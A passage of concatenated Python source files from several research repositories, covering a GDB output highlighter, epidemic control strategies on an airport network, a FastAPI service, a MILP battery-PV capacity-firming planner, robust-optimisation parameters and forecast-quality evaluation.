parts[0] = '\033[33m' + "{:6s}".format(self.op) + '\033[0m' # yellow
code = " ".join(parts)
# current line
if re.findall(r'^\s*=>\s', self.header):
header = '\033[32m' + self.header + '\033[0m' # green
else:
# sub doesn't support \033
parts = re.split(r'\+(\d+)>:', self.header)
header = parts[0] + '+\033[35m' + parts[1] + '\033[0m>:' + "".join(parts[2:])
return header + code
def highlight_gdb_disassemble(code):
insts = [FormatInst(l) for l in code.splitlines()]
return '\n'.join([inst.highlighted_str() for inst in insts])
``` |
{
"source": "jonathan-doenz/spanish_flu_on_airports",
"score": 3
} |
#### File: spanish_flu_on_airports/scripts/control_strategies.py
```python
import numpy as np
import networkx as nx
import collections
import random
########################################
######### Control strategies ###########
########################################
def random_airports_removal(gsc_SC_KM, nodes_statuses_pre_treatment, verbose, method_kwargs):
"""Remove random nodes (airports) of the graph."""
if verbose:
print('Perform random vaccination...')
num_nodes_to_remove = int( gsc_SC_KM.number_of_nodes() * \
method_kwargs['nodes_percentage_to_treat'] / 100 )
nodes_list = list(gsc_SC_KM.nodes)
random.shuffle(nodes_list)
nodes_to_remove = nodes_list[:num_nodes_to_remove]
# get the graph and dict with these nodes removed
treated_graph, nodes_statuses_post_treatment = \
remove_nodes_from_graph_and_dict(nodes_to_remove, gsc_SC_KM,
nodes_statuses_pre_treatment)
# report changes in a dict
treatment_info = method_kwargs.copy()
treatment_info['num_nodes_to_remove'] = num_nodes_to_remove
treatment_info['nodes_to_remove'] = nodes_to_remove
return treated_graph, nodes_statuses_post_treatment, treatment_info
def random_neighbors_removal(gsc_SC_KM, nodes_statuses_pre_treatment, verbose, method_kwargs):
"""Remove random neighbor of random nodes (airports) of the graph."""
if verbose:
print('Perform selected vaccination...')
num_nodes_to_remove = int( gsc_SC_KM.number_of_nodes() * \
method_kwargs['nodes_percentage_to_treat'] / 100 )
nodes_list = list(gsc_SC_KM.nodes)
random.shuffle(nodes_list)
random_initial_nodes = nodes_list[:num_nodes_to_remove]
# pick one random adjacent node from each of the initial nodes
nodes_to_remove_set = set()
for node_id in random_initial_nodes:
neighbours_list = [neighbor for neighbor in gsc_SC_KM.neighbors(node_id)]
random.shuffle(neighbours_list)
nodes_to_remove_set.add(neighbours_list[0])
nodes_to_remove = list(nodes_to_remove_set)
# get the graph and dict with these nodes removed
treated_graph, nodes_statuses_post_treatment = \
remove_nodes_from_graph_and_dict(nodes_to_remove, gsc_SC_KM,
nodes_statuses_pre_treatment)
# report changes in a dict
treatment_info = method_kwargs.copy()
treatment_info['num_nodes_to_remove'] = num_nodes_to_remove
treatment_info['nodes_to_remove'] = nodes_to_remove
return treated_graph, nodes_statuses_post_treatment, treatment_info
def largest_airports_removal(gsc_SC_KM, nodes_statuses_pre_treatment, verbose, method_kwargs):
"""Remove nodes (airports) with the highest degree (number of connections)."""
if verbose:
print('Perform largest_airports_removals...')
# get the node ids to remove
num_nodes_to_remove = int( gsc_SC_KM.number_of_nodes() * \
method_kwargs['nodes_percentage_to_treat'] / 100 )
degree_dict = {n: d for n, d in gsc_SC_KM.degree()}
ordered_degree_dict = {key: val for key, val in sorted(degree_dict.items(), key=lambda item: item[1], reverse=True)}
nodes_to_remove = list(ordered_degree_dict.keys())[:num_nodes_to_remove]
# get the graph and dict with these nodes removed
treated_graph, nodes_statuses_post_treatment = \
remove_nodes_from_graph_and_dict(nodes_to_remove, gsc_SC_KM,
nodes_statuses_pre_treatment)
# report changes in a dict
treatment_info = method_kwargs.copy()
treatment_info['num_nodes_to_remove'] = num_nodes_to_remove
treatment_info['nodes_to_remove'] = nodes_to_remove
return treated_graph, nodes_statuses_post_treatment, treatment_info
def largest_infected_airports_removal(gsc_SC_KM, nodes_statuses_pre_treatment,
verbose, method_kwargs):
"""Remove infected nodes (airports) with the highest degree (number of connections)."""
if verbose:
print('Perform largest_infected_airports_removals...')
# get the node ids to remove
num_nodes_to_remove = int( gsc_SC_KM.number_of_nodes() * \
method_kwargs['nodes_percentage_to_treat'] / 100 )
degree_dict = {n: d for n, d in gsc_SC_KM.degree()}
ordered_degree_dict = {key: val for key, val in sorted(degree_dict.items(), key=lambda item: item[1], reverse=True)}
infected_ordered_degree_dict = {node_id: deg for node_id, deg in ordered_degree_dict.items() \
if nodes_statuses_pre_treatment[node_id] == 'I'}
nodes_to_remove = list(infected_ordered_degree_dict.keys())[:num_nodes_to_remove]
# get the graph and dict with these nodes removed
treated_graph, nodes_statuses_post_treatment = \
remove_nodes_from_graph_and_dict(nodes_to_remove, gsc_SC_KM,
nodes_statuses_pre_treatment)
# report changes in a dict
treatment_info = method_kwargs.copy()
treatment_info['num_nodes_to_remove'] = num_nodes_to_remove
treatment_info['nodes_to_remove'] = nodes_to_remove
return treated_graph, nodes_statuses_post_treatment, treatment_info
def largest_routes_removal(gsc_SC_KM, nodes_statuses_pre_treatment, verbose, method_kwargs):
"""Remove edges (routes) with the highest weights (number of flights)."""
if verbose:
print('Perform largest_routes_removals...')
# get the edges to remove
num_edges_to_remove = int( gsc_SC_KM.number_of_edges() * \
method_kwargs['edges_percentage_to_treat'] / 100 )
edges_dict = {edge: gsc_SC_KM.edges[edge]['weight'] for edge in gsc_SC_KM.edges}
ordered_edges_dict = {key: val for key, val in sorted(edges_dict.items(), key=lambda item: item[1], reverse=True)}
edges_to_remove = list(ordered_edges_dict)[:num_edges_to_remove]
# get the graph and dict with these edges removed
treated_graph = \
remove_edges_from_graph(edges_to_remove, gsc_SC_KM)
nodes_statuses_post_treatment = nodes_statuses_pre_treatment.copy()
# report changes in a dict
treatment_info = method_kwargs.copy()
treatment_info['num_edges_to_remove'] = num_edges_to_remove
treatment_info['edges_to_remove'] = edges_to_remove
return treated_graph, nodes_statuses_post_treatment, treatment_info
#########################################################
# Helper functions for the control strategies functions #
#########################################################
def remove_nodes_from_graph_and_dict(nodes_to_remove, gsc_SC_KM, nodes_statuses_pre_treatment):
"""Remove nodes from graph and nodes_statuses dict."""
treated_graph = gsc_SC_KM.copy()
nodes_statuses_post_treatment = nodes_statuses_pre_treatment.copy()
for node_id in nodes_to_remove:
treated_graph.remove_node(node_id)
del nodes_statuses_post_treatment[node_id]
return treated_graph, nodes_statuses_post_treatment
def remove_edges_from_graph(edges_to_remove, gsc_SC_KM):
"""Remove edges from graph."""
treated_graph = gsc_SC_KM.copy()
for u, v in edges_to_remove:
treated_graph.remove_edge(u, v)
return treated_graph
``` |
{
"source": "JonathanDuarteGH/python-microservice-fastapi",
"score": 2
} |
#### File: cast_service/app/main.py
```python
from fastapi import FastAPI
from app.api.casts import casts
from app.api.db import metadata, database, engine
metadata.create_all(engine)
app = FastAPI(openapi_url="/api/v1/casts/openapi.json",
docs_url="/api/v1/casts/docs")
@app.on_event("startup")
async def startup():
await database.connect()
@app.on_event("shutdown")
async def shutdown():
await database.disconnect()
app.include_router(casts, prefix='/api/v1/casts', tags=['casts'])
``` |
{
"source": "jonathandumas/capacity-firming",
"score": 2
} |
#### File: determinist/algorithms/planner_MILP.py
```python
import math
import os
import time
import numpy as np
import pandas as pd
import gurobipy as gp
from gurobipy import GRB
from ro.utils import dump_file, build_observations, build_point_forecast
from root_project import ROOT_DIR
import matplotlib.pyplot as plt
from ro.ro_simulator_configuration import PARAMETERS
class Planner_MILP():
"""
MILP capacity firming formulation: binary variables to avoid simultaneous charge and discharge.
:ivar nb_periods: number of market periods (-)
:ivar period_hours: period duration (hours)
:ivar soc_ini: initial state of charge (kWh)
:ivar soc_end: final state of charge (kWh)
:ivar deadband_penalty: deadband deviation between production and nomination, % of the total installed capacity (kW)
constant for all market periods
:ivar pv_forecast: PV point forecasts (kW)
:ivar engagement: Nomination to the grid (injection > 0, withdrawal < 0) (kW)
shape = (nb_market periods,)
:ivar df_parameters: pd.DataFrame with price, deadband_nomination, min_nomination, max_nomination, min_production, max_production
shape = (nb_market periods, 6)
:ivar selling_price: selling price (€/ kWh)
different between of-peak and peak hours
:ivar deadband_nomination: deadband between two consecutive nominations, % of the total installed capacity (kW)
different between of-peak and peak hours
shape = (nb_market periods,)
:ivar model: a Gurobi model (-)
"""
def __init__(self, pv_forecast:np.array, engagement:np.array=None):
"""
Init the planner.
"""
self.parameters = PARAMETERS # simulation parameters
self.period_hours = PARAMETERS['period_hours'] # (hour)
self.nb_periods = int(24 / self.period_hours)
self.t_set = range(self.nb_periods)
self.pv_forecast = pv_forecast # (kW)
self.engagement = engagement # (kW)
self.PVcapacity = PARAMETERS['pv_capacity'] # (kWp)
self.tol_penalty = PARAMETERS['tol_penalty'] # (%)
self.deadband_penalty = self.tol_penalty * self.PVcapacity # (kW)
self.penalty_factor = PARAMETERS['penalty_factor'] # penalty factor
self.overproduction = PARAMETERS['OVERPRODUCTION'] # forbid overproduction
if all([item in PARAMETERS['df_params'].columns for item in ['price', 'deadband_nomination', 'min_nomination', 'max_nomination', 'min_production','max_production']]):
self.selling_price = PARAMETERS['df_params']['price'].values # (€/ kWh)
self.deadband_nomination = PARAMETERS['df_params']['deadband_nomination'].values # (kW/period)
self.min_nomination = PARAMETERS['df_params']['min_nomination'].values # (kW)
self.max_nomination = PARAMETERS['df_params']['max_nomination'].values # (kW)
self.min_production = PARAMETERS['df_params']['min_production'].values # (kW)
self.max_production = PARAMETERS['df_params']['max_production'].values # (kW)
else:
print("df_parameters is not ok ")
# BESS parameters
self.BESScapacity = PARAMETERS['BESS']['BESS_capacity'] # (kWh)
self.soc_ini = PARAMETERS['BESS']['soc_ini'] # (kWh)
self.soc_end = PARAMETERS['BESS']['soc_end'] # (kWh)
self.soc_min = PARAMETERS['BESS']['soc_min'] # (kWh)
self.soc_max = PARAMETERS['BESS']['soc_max'] # (kWh)
self.charge_eff = PARAMETERS['BESS']['charge_eff'] # (/)
self.discharge_eff = PARAMETERS['BESS']['discharge_eff'] # (/)
self.charge_power = PARAMETERS['BESS']['charge_power'] # (kW)
self.discharge_power = PARAMETERS['BESS']['discharge_power'] # (kW)
self.high_soc_price = PARAMETERS['BESS']['HIGH_SOC_PRICE'] # (euros/kWh) -> fictive price to incentivize to charge BESS
self.time_building_model = None
self.time_solving_model = None
# Create model
self.model = self.create_model()
# Solve model
self.solver_status = None
def create_model(self):
"""
Create the optimization problem.
"""
t_build = time.time()
# -------------------------------------------------------------------------------------------------------------
# 1. create model
model = gp.Model("planner_MILP_gurobi")
# -------------------------------------------------------------------------------------------------------------
# 2. create variables
# 2.1 First-stage variables -> x
x = model.addVars(self.nb_periods, lb=-GRB.INFINITY, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name="x") # Nomination at the grid coupling point (injection > 0, withdrawal < 0) (kW)
if self.engagement is not None:
for i in self.t_set:
x[i].setAttr("ub", self.engagement[i])
x[i].setAttr("lb", self.engagement[i])
# 2.2 Second-stage variables -> y
y_prod = model.addVars(self.nb_periods, lb=-GRB.INFINITY, ub=GRB.INFINITY, obj=-0, vtype=GRB.CONTINUOUS, name="y_prod") # Production at the grid coupling point (injection > 0, withdrawal < 0) (kW)
y_short_dev = model.addVars(self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name="y_short_dev") # y_short_dev >= - (y_prod - x-) with x- = x - deadband_deviation_kW
y_long_dev = model.addVars(self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name="y_long_dev") # y_long_dev >= - (x+ - y_prod) with x+ = x + deadband_deviation_kW
y_s = model.addVars(self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name="y_s") # State of charge of the battery (kWh)
y_charge = model.addVars(self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name="y_charge") # Charging power (kW)
y_discharge = model.addVars(self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name="y_discharge") # Discharging power (kW)
y_PV = model.addVars(self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name="y_PV") # PV generation (kW)
y_b = model.addVars(self.nb_periods, obj=0, vtype=GRB.BINARY, name="y_b") # binary variable -> y_b = 1 -> charge / y_b = 0 -> discharge
# -------------------------------------------------------------------------------------------------------------
# 3. create objective
objective = gp.quicksum(self.period_hours * self.selling_price[i] * (-y_prod[i] + self.penalty_factor * (y_short_dev[i] + y_long_dev[i])) - self.high_soc_price * y_s[i] for i in self.t_set)
model.setObjective(objective, GRB.MINIMIZE)
# -------------------------------------------------------------------------------------------------------------
# 4. create constraints
# 4.1 First stage constraints
# engagement min cst
model.addConstrs((x[i] >= self.min_nomination[i] for i in self.t_set), name='c_xmin')
# engagement max cst
model.addConstrs((x[i] <= self.max_nomination[i] for i in self.t_set), name='c_xmax')
# engagement ramping constraint up -> skip first period -> nb periods -1 constraints
model.addConstrs((x[i] - x[i - 1] <= self.deadband_nomination[i] for i in range(1, self.nb_periods)), name='c_x_rampingUp')
# engagement ramping constraint down -> skip first period -> nb periods -1 constraints
model.addConstrs((x[i - 1] - x[i] <= self.deadband_nomination[i] for i in range(1, self.nb_periods)), name='c_x_rampingDown')
# 4.2 Second-stage constraints
# max charge cst
model.addConstrs((y_charge[i] <= y_b[i] * self.charge_power for i in self.t_set), name='c_max_charge')
# max discharge cst
model.addConstrs((y_discharge[i] <= (1 - y_b[i]) * self.discharge_power for i in self.t_set), name='c_max_discharge')
# min soc cst
model.addConstrs((y_s[i] >= self.soc_min for i in self.t_set), name='c_min_s')
# min soc cst
model.addConstrs((y_s[i] <= self.soc_max for i in self.t_set), name='c_max_s')
# power balance equation
model.addConstrs((y_prod[i] - y_PV[i] - (y_discharge[i] - y_charge[i]) == 0 for i in self.t_set), name='c_power_balance_eq')
# min production
model.addConstrs((y_prod[i] >= self.min_production[i] for i in self.t_set), name='c_min_y_prod')
# max production
model.addConstrs((y_prod[i] <= self.max_production[i] for i in self.t_set), name='c_max_y_prod')
if self.overproduction:
# forbid overproduction
model.addConstrs((y_prod[i] <= (x[i] + self.deadband_penalty) for i in self.t_set), name='c_over_prod')
# BESS dynamics first period
model.addConstr((y_s[0] - self.period_hours * (self.charge_eff * y_charge[0] - y_discharge[0] / self.discharge_eff) == self.soc_ini), name='c_BESS_first_period')
# BESS dynamics from second to last periods
model.addConstrs((y_s[i] - y_s[i-1]- self.period_hours * (self.charge_eff * y_charge[i] - y_discharge[i] / self.discharge_eff) == 0 for i in range(1, self.nb_periods)), name='c_BESS_dynamics')
# BESS dynamics last period
model.addConstr((y_s[self.nb_periods-1] == self.soc_end ), name='c_BESS_last_period')
# Short penalty cst
model.addConstrs((y_short_dev[i] >= (x[i] - self.deadband_penalty) - y_prod[i] for i in self.t_set), name='c_short_penalty')
# Long penalty cst
model.addConstrs((y_long_dev[i] >= y_prod[i] - (x[i] + self.deadband_penalty) for i in self.t_set), name='c_long_penalty')
# PV generation cst
model.addConstrs((y_PV[i] <= self.pv_forecast[i] for i in self.t_set), name='c_PV_generation')
# -------------------------------------------------------------------------------------------------------------
# 5. Store variables
self.allvar = dict()
self.allvar['x'] = x
self.allvar['y_prod'] = y_prod
self.allvar['y_short_dev'] = y_short_dev
self.allvar['y_long_dev'] = y_long_dev
self.allvar['y_s'] = y_s
self.allvar['y_charge'] = y_charge
self.allvar['y_discharge'] = y_discharge
self.allvar['y_PV'] = y_PV
self.allvar['y_b'] = y_b
self.time_building_model = time.time() - t_build
# print("Time spent building the mathematical program: %gs" % self.time_building_model)
return model
def solve(self, LogToConsole:bool=False, logfile:str="", Threads:int=0, MIPFocus:int=0, TimeLimit:float=GRB.INFINITY):
t_solve = time.time()
self.model.setParam('LogToConsole', LogToConsole) # no log in the console if set to False
# self.model.setParam('OutputFlag', outputflag) # no log into console and log file if set to True
# self.model.setParam('MIPGap', 0.01)
self.model.setParam('TimeLimit', TimeLimit)
self.model.setParam('MIPFocus', MIPFocus)
# self.model.setParam('DualReductions', 0) # Model was proven to be either infeasible or unbounded. To obtain a more definitive conclusion, set the DualReductions parameter to 0 and reoptimize.
# If you are more interested in good quality feasible solutions, you can select MIPFocus=1.
# If you believe the solver is having no trouble finding the optimal solution, and wish to focus more attention on proving optimality, select MIPFocus=2.
# If the best objective bound is moving very slowly (or not at all), you may want to try MIPFocus=3 to focus on the bound.
self.model.setParam('LogFile', logfile) # no log in file if set to ""
self.model.setParam('Threads', Threads) # Default value = 0 -> use all threads
self.model.optimize()
self.solver_status = self.model.status
self.time_solving_model = time.time() - t_solve
def store_solution(self):
m = self.model
solution = dict()
solution['status'] = m.status
if solution['status'] == 2 or solution['status'] == 9:
solution['obj'] = m.objVal
# 1 dimensional variables
for var in ['x', 'y_prod', 'y_short_dev', 'y_long_dev', 'y_s', 'y_charge', 'y_discharge', 'y_PV', 'y_b']:
solution[var] = [self.allvar[var][t].X for t in self.t_set]
else:
print('WARNING planner MILP status %s -> problem not solved, objective is set to nan' %(solution['status']))
solution['obj'] = math.nan
# 3. Timing indicators
solution["time_building"] = self.time_building_model
solution["time_solving"] = self.time_solving_model
solution["time_total"] = self.time_building_model + self.time_solving_model
return solution
def export_model(self, filename):
"""
Export the pyomo model into a cpxlp format.
:param filename: directory and filename of the exported model.
"""
self.model.write("%s.lp" % filename)
# self.model.write("%s.mps" % filename)
# Validation set
VS = 'VS1' # 'VS1', 'VS2
if __name__ == "__main__":
# Set the working directory to the root of the project
print(os.getcwd())
os.chdir(ROOT_DIR)
print(os.getcwd())
dirname = 'ro/determinist/export/'
# load data
pv_solution = build_observations()
pv_dad = build_point_forecast()
# Select a paticular day of the dataset
day = '2020-05-26'
pv_solution_day = pv_solution.loc[day].values
pv_forecast_day = pv_dad.loc[day].values
# Plot point forecasts vs observations
FONTSIZE = 20
plt.figure()
plt.plot(pv_solution_day, label='observations')
plt.plot(pv_forecast_day, label='forecast')
plt.ylabel('kW', fontsize=FONTSIZE, rotation='horizontal')
plt.xticks(fontsize=FONTSIZE)
plt.yticks(fontsize=FONTSIZE)
plt.legend(fontsize=FONTSIZE)
plt.tight_layout()
plt.show()
# MILP planner with perfect forecasts -> oracle
planner_oracle = Planner_MILP(pv_forecast=pv_solution_day)
planner_oracle.export_model(dirname + 'planner_MILP')
planner_oracle.solve()
solution_oracle = planner_oracle.store_solution()
print('objective oracle %.2f' % (solution_oracle['obj']))
# MILP planner with point forecasts
planner = Planner_MILP(pv_forecast=pv_solution_day)
planner.solve()
solution = planner.store_solution()
# dump_file(dir=dirname, name='solution_point_forecasts', file=solution['x'])
print('objective point forecasts %.2f' % (solution['obj']))
plt.figure()
plt.plot(solution_oracle['x'], label='x oracle')
plt.plot(solution['x'], label='x LSTM point')
# plt.plot(pv_solution_day, label= 'Pm')
# plt.plot(pv_forecast_day, label= 'Pp')
plt.ylabel('kW', fontsize=FONTSIZE, rotation='horizontal')
plt.xticks(fontsize=FONTSIZE)
plt.yticks(fontsize=FONTSIZE)
plt.legend(fontsize=FONTSIZE)
plt.ylim(-0.05 * PARAMETERS['pv_capacity'], PARAMETERS['pv_capacity'])
plt.title('MILP formulation')
plt.legend(fontsize=FONTSIZE)
# plt.savefig(dirname+ 'MILP_oracle_vs_point.pdf')
plt.show()
```
#### File: robust/algorithms/ro_params.py
```python
import os
import random
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from ro.utils import build_observations, build_point_forecast, build_point_intra_forecast, load_lstm_quantiles
from root_project import ROOT_DIR
from ro.ro_simulator_configuration import PARAMETERS
def compute_ro_dyn_params(pv_quantile: np.array, d_gamma_threshold: float, d_pvmin: float):
"""
Compute the max depth and Gamma parameters for dynamic Robust Optimization given the parameters d_gamma_threshold and d_pvmin.
:param pv_quantile:
:param d_gamma_threshold:
:param d_pvmin:
:return: max depth and gamma.
"""
df = pd.DataFrame()
df['50-10'] = pv_quantile[:, 4] - pv_quantile[:, 0]
df['50-20'] = pv_quantile[:, 4] - pv_quantile[:, 1]
df['50-30'] = pv_quantile[:, 4] - pv_quantile[:, 2]
df['50-40'] = pv_quantile[:, 4] - pv_quantile[:, 3]
# Time periods where q 50 = 0
q50_0_indx = np.argwhere((pv_quantile[:, 4] > 0).astype(np.int) == 0)[:, 0]
# Count time periods where d 50-10 > gamma_threshold
tab_gamma = (df['50-10'].values > d_gamma_threshold).astype(np.int)
gamma = sum(tab_gamma)
# Count time periods where d 50-20, d 50-30, d50-40 > depth_threshold
tab_50_40 = (df['50-40'].values > d_pvmin * df['50-10'].values).astype(np.int)
tab_50_30 = (df['50-30'].values > d_pvmin * df['50-10'].values).astype(np.int)
tab_50_20 = (df['50-20'].values > d_pvmin * df['50-10'].values).astype(np.int)
tab_depth = tab_50_40 + tab_50_30 + tab_50_20
for i in q50_0_indx:
tab_depth[i] = 0
tab_gamma[i] = 0
# FONTSIZE = 10
# x_index = [i for i in range(0, 96)]
# plt.figure()
# plt.plot(x_index, tab_depth, label='depth')
# plt.plot(x_index, tab_gamma, label=r'$\Gamma=$'+str(gamma))
# plt.ylim(0, 4)
# plt.xticks(fontsize=FONTSIZE)
# plt.yticks(fontsize=FONTSIZE)
# plt.title(day)
# plt.tight_layout()
# plt.legend(fontsize=FONTSIZE)
# plt.show()
# Build the worst PV trajectory
worst_pv = pv_quantile[:, 3].copy() # quantile 40%
for k in range(0, 95 + 1):
if tab_depth[k] == 1:
worst_pv[k] = pv_quantile[k, 2] # quantile 30%
elif tab_depth[k] == 2:
worst_pv[k] = pv_quantile[k, 1] # quantile 20%
elif tab_depth[k] == 3:
worst_pv[k] = pv_quantile[k, 0] # quantile 10%
return worst_pv, gamma
nb_periods = 96
N_Q = 9
q_set = [0, 1, 2, 3, 4, 5, 6, 7, 8] # -> 10%, 20%, .., 90%
config = ['oracle', 'point'] + q_set # ['oracle', 'point'] + q_set
# Validation set
nb_days = 30 # 30, 334 = total number of days of the dataset
VS = str(nb_days) #
if __name__ == "__main__":
# Set the working directory to the root of the project
print(os.getcwd())
os.chdir(ROOT_DIR)
print(os.getcwd())
print('-----------------------------------------------------------------------------------------------------------')
# load data
pv_solution = build_observations()
pv_dad = build_point_forecast()
pv_intra = build_point_intra_forecast()
# Load quantile forecasts: from 0 to 8 -> median = quantile 4
pv_quantile = load_lstm_quantiles()
day_list = [day.strftime('%Y-%m-%d') for day in pv_intra.index]
random.seed(1)
if nb_days == len(day_list):
day_list_sampled = day_list
else:
day_list_sampled = random.sample(day_list, nb_days)
# -----------------------------------------------------------------------------------------------------------
# RESULTS
# -----------------------------------------------------------------------------------------------------------
gamma_threshold = 0.1 * PARAMETERS["pv_capacity"]
depth_threshold = 0.3
for day in day_list_sampled[:10]:
pv_solution_day = pv_solution.loc[day].values
pv_point_day = pv_dad.loc[day].values
pv_quantile_day = pv_quantile.loc[day].values.reshape(nb_periods, N_Q)
FONTSIZE = 10
x_index = [i for i in range(0, nb_periods)]
plt.figure()
for j in range(1, N_Q // 2+1):
plt.fill_between(x_index, pv_quantile_day[:,j + N_Q // 2], pv_quantile_day[:,(N_Q // 2) - j], alpha=0.5 / j, color=(1 / j, 0, 1))
plt.plot(x_index, pv_quantile_day[:,4], 'b', linewidth=3, label='50 %')
plt.plot(x_index, pv_solution_day, 'r', linewidth=3, label='obs')
plt.plot(x_index, pv_point_day, 'k--', linewidth=3, label='point')
plt.ylim(0, PARAMETERS["pv_capacity"])
plt.ylabel('kW', fontsize=FONTSIZE, rotation='horizontal')
plt.xticks(fontsize=FONTSIZE)
plt.yticks(fontsize=FONTSIZE)
plt.legend(fontsize=FONTSIZE)
plt.title(day)
plt.tight_layout()
plt.show()
# plt.figure()
# for j in range(0, 3+1):
# plt.plot(pv_quantile_day[:, 4] - pv_quantile_day[:, j], label='50 % - ' + str(10+10*j) + ' %')
# plt.plot(depth_threshold * (pv_quantile_day[:, 4] - pv_quantile_day[:, 0]), 'k',label='depth threshold')
# plt.hlines(y=gamma_threshold, xmin=0, xmax=95, colors='r', label='gamma threshold')
# plt.ylim(0, 0.5 * PARAMETERS["pv_capacity"])
# plt.ylabel('kW', fontsize=FONTSIZE, rotation='horizontal')
# plt.xticks(fontsize=FONTSIZE)
# plt.yticks(fontsize=FONTSIZE)
# plt.legend(fontsize=FONTSIZE)
# plt.title(day)
# plt.tight_layout()
# plt.show()
worst_pv, gamma = compute_ro_dyn_params(pv_quantile=pv_quantile_day, d_gamma_threshold=gamma_threshold, d_pvmin=depth_threshold)
plt.figure()
for j in range(1, 5+1):
plt.plot(x_index, pv_quantile_day[:,5-j], alpha=1 / j, color=(1 / j, 0, 1), linewidth=3, label=str(10*(5-j+1)) + '%')
plt.plot(x_index, worst_pv, 'g',linewidth=3, label='worst PV with '+r'$\Gamma=$'+str(gamma))
plt.plot(x_index, pv_solution_day, 'r:', linewidth=3, label='obs')
plt.plot(x_index, pv_point_day, 'k--', linewidth=3, label='point')
plt.ylim(0, PARAMETERS["pv_capacity"])
plt.ylabel('kW', fontsize=FONTSIZE, rotation='horizontal')
plt.xticks(fontsize=FONTSIZE)
plt.yticks(fontsize=FONTSIZE)
plt.legend(fontsize=FONTSIZE)
plt.title(day)
plt.tight_layout()
plt.show()
``` |
{
"source": "jonathandumas/generative-models-power-systems",
"score": 2
} |
#### File: GEFcom2014/forecast_quality/CRPS_QS_all_tracks.py
```python
import os
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import mean_absolute_error
from GEFcom2014 import pv_data, wind_data, load_data, read_file
from GEFcom2014.forecast_quality.utils_quality import plf_per_quantile, compute_reliability, crps_per_period
if __name__ == "__main__":
"""
Quality scenario evaluation for all tracks (CRPS, QS, and reliability diagrams)
"""
dir_path = 'export/all_tracks/'
if not os.path.isdir(dir_path): # test if directory exist
os.makedirs(dir_path)
# ------------------------------------------------------------------------------------------------------------------
# GEFcom IJF_paper case study
# Solar track: 3 zones
# Wind track: 10 zones
# Load track: 1 zones
# 50 days picked randomly per zone for the VS and TEST sets
# ------------------------------------------------------------------------------------------------------------------
model_labels = ['NF', 'VAE', 'GAN']
colors = ['tab:blue', 'tab:orange', 'tab:green']
nb_scenarios = 100
N_q = 99
CRPS = True
plf_all_models = dict()
crps_all_models = dict()
aq_all_models = dict()
mae_r_all_models = dict()
nf_a_id = {'pv': 10,
'wind': 8,
'load': 1}
nf_umnn_id = {'pv': 3,
'wind': 1,
'load': 1}
for tag in ['wind', 'pv', 'load']:
# tag = 'wind' # pv, wind, load
if tag == 'pv':
# WARNING: the time periods where PV is always 0 (night hours) are removed -> there are 8 periods removed
# The index of the time periods removed are provided into indices
data, indices = pv_data(path_name='../data/solar_new.csv', test_size=50, random_state=0)
nb_zones = 3
elif tag == 'wind':
data = wind_data(path_name='../data/wind_data_all_zone.csv', test_size=50, random_state=0)
nb_zones = 10
indices = []
elif tag == 'load':
data = load_data(path_name='../data/load_data_track1.csv', test_size=50, random_state=0)
nb_zones = 1
indices = []
df_x_LS = data[0].copy()
df_y_LS = data[1].copy()
df_x_VS = data[2].copy()
df_y_VS = data[3].copy()
df_x_TEST = data[4].copy()
df_y_TEST = data[5].copy()
nb_days_LS = int(len(df_y_LS) /nb_zones)
nb_days_VS = int(len(df_y_VS) /nb_zones )
nb_days_TEST = int(len(df_y_TEST) /nb_zones)
print('#LS %s days #VS %s days # TEST %s days' % (nb_days_LS, nb_days_VS, nb_days_TEST))
# ------------------------------------------------------------------------------------------------------------------
# Rebuilt the PV observations with the removed time periods
# ------------------------------------------------------------------------------------------------------------------
non_null_indexes = list(np.delete(np.asarray([i for i in range(24)]), indices))
if tag == 'pv':
# Rebuilt the PV observations with the removed time periods
df_y_TEST.columns = non_null_indexes
for i in indices:
df_y_TEST[i] = 0
df_y_TEST = df_y_TEST.sort_index(axis=1)
# --------------------------------------------------------------------------------------------------------------
# Quality metrics
# --------------------------------------------------------------------------------------------------------------
y_true = df_y_TEST.values.reshape(-1) # reshape from (#TEST, 24) to (24*,#TEST)
# --------------------------------------------------------------------------------------------------------------
# 0. Load scenarios on the TS for 'NF-UMNN', 'NF-A', 'VAE', 'GAN', and 'RAND'
# --------------------------------------------------------------------------------------------------------------
# scenarios shape = (24*n_days, n_s)
s_umnn = read_file(dir='scenarios/nfs/', name='scenarios_' + tag + '_UMNN_M_' + str(nf_umnn_id[tag]) + '_0_100_TEST')
# s_an = read_file(dir='scenarios/nfs/', name='scenarios_' + tag + '_AN_M_'+str(nf_a_id[tag])+'_0_100_TEST')
s_vae = read_file(dir='scenarios/vae/', name='scenarios_' + tag + '_VAElinear_1_0_100_TEST')
s_gan = read_file(dir='scenarios/gan/', name='scenarios_' + tag + '_GAN_wasserstein_1_0_100_TEST')
# s_gc = read_file(dir='scenarios/gc/', name='scenarios_' + tag + '_gc_100_TEST')
s_rand = read_file(dir='scenarios/random/', name='scenarios_' + tag + '_random_100_TEST')
scenarios_list = [s_umnn, s_vae, s_gan, s_rand]
# PLot scenarios
n_days = 1
FONTSIZE = 15
x_index = [i for i in range(1, n_days*24 + 1)]
plt.figure()
plt.plot(x_index, s_umnn[:n_days*24,:10], color='gray', linewidth=3, alpha=0.5)
plt.ylim(0, 1)
plt.tick_params(axis='both', labelsize=FONTSIZE)
plt.tight_layout()
plt.savefig(dir_path + tag + '_scenarios.pdf')
plt.show()
plt.figure()
plt.plot(x_index, y_true[:n_days*24], color='red', linewidth=3)
plt.ylim(0, 1)
plt.tick_params(axis='both', labelsize=FONTSIZE)
plt.tight_layout()
plt.savefig(dir_path + tag + '_true.pdf')
plt.show()
# --------------------------------------------------------------------------------------------------------------
# 1. Generate quantiles from scenarios
# --------------------------------------------------------------------------------------------------------------
q_set = [i / (N_q + 1) for i in range(1, N_q + 1)]
# Quantiles are generated into an array of shape (n_day*24, N_q), the same shape than scenarios
quantiles_list = []
for s in scenarios_list:
quantiles_list.append(np.quantile(s, q=q_set, axis=1).transpose())
